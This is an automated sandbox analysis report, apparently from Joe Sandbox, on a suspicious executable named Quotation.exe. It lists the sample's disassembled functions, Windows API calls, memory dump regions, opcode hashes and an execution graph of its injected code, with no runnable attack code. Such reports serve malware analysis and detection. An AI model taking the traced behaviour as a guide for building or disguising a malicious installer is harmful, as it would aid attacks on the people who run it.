                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsd350B.tmp$C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll
                                                              • API String ID: 1659193697-3527613287
                                                              • Opcode ID: 457cedb22ed2f7019c5e446f23c2104e1a0fd1eea80a96ba194a72848a41722a
                                                              • Instruction ID: 24c820640bf83c35ca015f911653a3ecbd9f7363fc1a8715c972f2d02b23d4ac
                                                              • Opcode Fuzzy Hash: 457cedb22ed2f7019c5e446f23c2104e1a0fd1eea80a96ba194a72848a41722a
                                                              • Instruction Fuzzy Hash: 11113A72A40311BBCB00BBB19E46EAE36709F50748F60443FF402F61C0D6FD4991565E
                                                              Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(00000000,00000000,004031FC,?), ref: 00403031
                                                              • GetTickCount.KERNEL32 ref: 0040304F
                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                              • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                              • String ID:
                                                              • API String ID: 2102729457-0
                                                              • Opcode ID: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                              • Instruction ID: fc94ebd698381dfc42c8ec832a7b78cf8da54aaf5e1058e2af7a384a9ccf94d3
                                                              • Opcode Fuzzy Hash: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                              • Instruction Fuzzy Hash: 0FF05471602621ABC6306F50BD08A9B7E69FB44B53F41087AF045B11A9CB7548828B9C
                                                              Function 0040551A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 00405549
                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
                                                                • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                              • Instruction ID: 85372f17a9103eb01fcdfd8a19690b8d052d76dd043ca16804f8a0d8951f02ed
                                                              • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                              • Instruction Fuzzy Hash: 53017171200609BFDF309F51DD80AAB362AFB84750F540437FA047A1D5C7B98D52AE69
                                                              Function 00403B5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
                                                              • GlobalFree.KERNEL32(005C1A88), ref: 00403B7F
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B5E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Free$GlobalLibrary
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 1100898210-823278215
                                                              • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                              • Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
                                                              • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                              • Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8
                                                              Function 00405E3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00405E42
                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00405E52
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-1246513382
                                                              • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                              • Instruction ID: eba18341e72c17137544591cfc51a7e4cac6184970473274e9d14fc4341c5a90
                                                              • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                              • Instruction Fuzzy Hash: 29D0A7F3400A30DAC3127708EC00D9F77ACEF16700746443AE580A7165D7785D818AEC
                                                              Function 00405F76 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
                                                              • CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                              • Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
                                                              • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                              • Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8

                                                              Execution Graph

                                                              Execution Coverage:0.1%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:31.8%
                                                              Total number of Nodes:22
                                                              Total number of Limit Nodes:2
                                                              execution_graph 53133 33ef8785 53154 33e92bf0 LdrInitializeThunk 53133->53154 53135 33ef87cd 53138 33ef885f 53135->53138 53155 33e90634 LdrInitializeThunk 53135->53155 53137 33ef887f 53140 33ef888a 53137->53140 53162 33f102f4 LdrInitializeThunk 53137->53162 53138->53137 53156 33e92c70 LdrInitializeThunk 53138->53156 53142 33ef87fb 53153 33ef8844 53142->53153 53157 33f1024e LdrInitializeThunk 53142->53157 53145 33ef889e 53145->53153 53158 33e92fb0 LdrInitializeThunk 53145->53158 53147 33ef88b0 53148 33ef88cf 53147->53148 53147->53153 53163 33f102f4 LdrInitializeThunk 53147->53163 53159 33e92b60 LdrInitializeThunk 53148->53159 53151 33ef88d7 53160 33e92e80 LdrInitializeThunk 53151->53160 53153->53138 53161 33e92b60 LdrInitializeThunk 53153->53161 53154->53135 53155->53142 53156->53137 53157->53145 53158->53147 53159->53151 53160->53153 53161->53138 53162->53140 53163->53148 53167 33e92ad0 LdrInitializeThunk

                                                              Executed Functions

                                                              Function 33E92BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2 33e92bf0-33e92bfc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 503af94f988c604fbf144eca75a7c711d1a64ce82860062ac8a11ff3adcc8869
                                                              • Instruction ID: fdaa7cde21890d8e92902cd47bf4f96a1f5af859321095232ac19bfc2d0d80b8
                                                              • Opcode Fuzzy Hash: 503af94f988c604fbf144eca75a7c711d1a64ce82860062ac8a11ff3adcc8869
                                                              • Instruction Fuzzy Hash: B6900271B0140C02D1C0719C440564A080557D1302F95C016A0025A14DCA158B5D77A1
                                                              Function 33E92B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1 33e92b60-33e92b6c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c658b8c3b85d79891460c1badd3e7ba31c977405a0381d62c6a381c27aeb01d2
                                                              • Instruction ID: 72d16e5c9dd20928915275d5442a8d195d7028aa320a1ff35d48165beb6f2279
                                                              • Opcode Fuzzy Hash: c658b8c3b85d79891460c1badd3e7ba31c977405a0381d62c6a381c27aeb01d2
                                                              • Instruction Fuzzy Hash: DD9002B1B02404034145719C4415616480A57E0202B55C022E1014950DC52589956125
                                                              Function 33E92AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 33e92ad0-33e92adc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 809dde2186e7b7780f40f5e9841a3efd613e69f44576c8223ccf5e507214d508
                                                              • Instruction ID: 8e1a2b056a4f715cb22b7b16fedc4d4e3041c3f4ef59a55efbf43bfa8a2f51cb
                                                              • Opcode Fuzzy Hash: 809dde2186e7b7780f40f5e9841a3efd613e69f44576c8223ccf5e507214d508
                                                              • Instruction Fuzzy Hash: 74900475F11404030145F5DC07055070C4757D5353355C033F1015D10CD731CD755131
                                                              Function 33E92FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 14 33e92fe0-33e92fec LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: db8360bd051c52af4911011243df5ce8cd95cdec8075d58ed41f22d9106211f4
                                                              • Instruction ID: 8a59d90ddc05225e4a2f77a572126cf26cbdc15043f6ae9bdc5211fc5dc2dae0
                                                              • Opcode Fuzzy Hash: db8360bd051c52af4911011243df5ce8cd95cdec8075d58ed41f22d9106211f4
                                                              • Instruction Fuzzy Hash: FD900271B11C0442D24075AC4C15B07080557D0303F55C116A0154914CC91589655521
                                                              Function 33E92FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 13 33e92fb0-33e92fbc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 13aa1fb3707b7bacf14ef9baf3ca28626eded41b2cbc342c8a1b8226d1ff04ae
                                                              • Instruction ID: 8c3f1b0e6dc739ca793be0f558eeacca5634eb8e05d54448764336a60bff8782
                                                              • Opcode Fuzzy Hash: 13aa1fb3707b7bacf14ef9baf3ca28626eded41b2cbc342c8a1b8226d1ff04ae
                                                              • Instruction Fuzzy Hash: 0D900271F0140442418071AC884590648057BE1212755C122A0998910D855989695665
                                                              Function 33E92F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 12 33e92f90-33e92f9c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bd5be4a21be40773c944e2901ab4417b0217cc6813a1d4258bae6fd077d0ed64
                                                              • Instruction ID: c09c477dcef65d7efb65fea738ab550c51759e2640cfa0a6eb543f740f098ef7
                                                              • Opcode Fuzzy Hash: bd5be4a21be40773c944e2901ab4417b0217cc6813a1d4258bae6fd077d0ed64
                                                              • Instruction Fuzzy Hash: 58900271B0180802D140719C481570B080557D0303F55C012A1164915D862589556571
                                                              Function 33E92F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 11 33e92f30-33e92f3c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 07123ec389498fe9f2e9cfa79c629b03e4cfbf0273d26a6d94b16d035d97d9bd
                                                              • Instruction ID: b4bf17efdaebbb63b23d1ebff2d4f923302088e0aabf1d076c36fe96fd6369d6
                                                              • Opcode Fuzzy Hash: 07123ec389498fe9f2e9cfa79c629b03e4cfbf0273d26a6d94b16d035d97d9bd
                                                              • Instruction Fuzzy Hash: 559002B1B4140842D140719C4415B06080597E1302F55C016E1064914D8619CD566126
                                                              Function 33E92EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 10 33e92ea0-33e92eac LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 85368433a47673e90b5360e51f001ff7fa46ed80e3894929f10bd717f17374f6
                                                              • Instruction ID: c9fbf71899d11ad14b23a9e36de9f27f481d1699f8f05ac240b028a6f508a439
                                                              • Opcode Fuzzy Hash: 85368433a47673e90b5360e51f001ff7fa46ed80e3894929f10bd717f17374f6
                                                              • Instruction Fuzzy Hash: BE9002B1B0140802D180719C4405746080557D0302F55C012A5064914E86598ED96665
                                                              Function 33E92E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 9 33e92e80-33e92e8c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: eabe0fb6f9bd880e250878491f740f91bb716ba35978c3b91764cae4edad3547
                                                              • Instruction ID: 66deb7c92bcde6a0e013b407e4cd8f4e5f649d095c06b05f174b1a01693e830c
                                                              • Opcode Fuzzy Hash: eabe0fb6f9bd880e250878491f740f91bb716ba35978c3b91764cae4edad3547
                                                              • Instruction Fuzzy Hash: 70900271F0140902D141719C4405616080A57D0242F95C023A1024915ECA258A96A131
                                                              Function 33E92DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 8 33e92df0-33e92dfc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: d806a9b6602f6032da94e157412d23f89c0d8e28eadc61f10b80b26044c844a2
                                                              • Instruction ID: 7b8c6c2321c107dae1f92fbefbf3c83e7d06d7aa4d42b8d78ab5ac8e0d765d4c
                                                              • Opcode Fuzzy Hash: d806a9b6602f6032da94e157412d23f89c0d8e28eadc61f10b80b26044c844a2
                                                              • Instruction Fuzzy Hash: B2900271B0140813D151719C4505707080957D0242F95C413A0424918D96568A56A121
                                                              Function 33E92DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
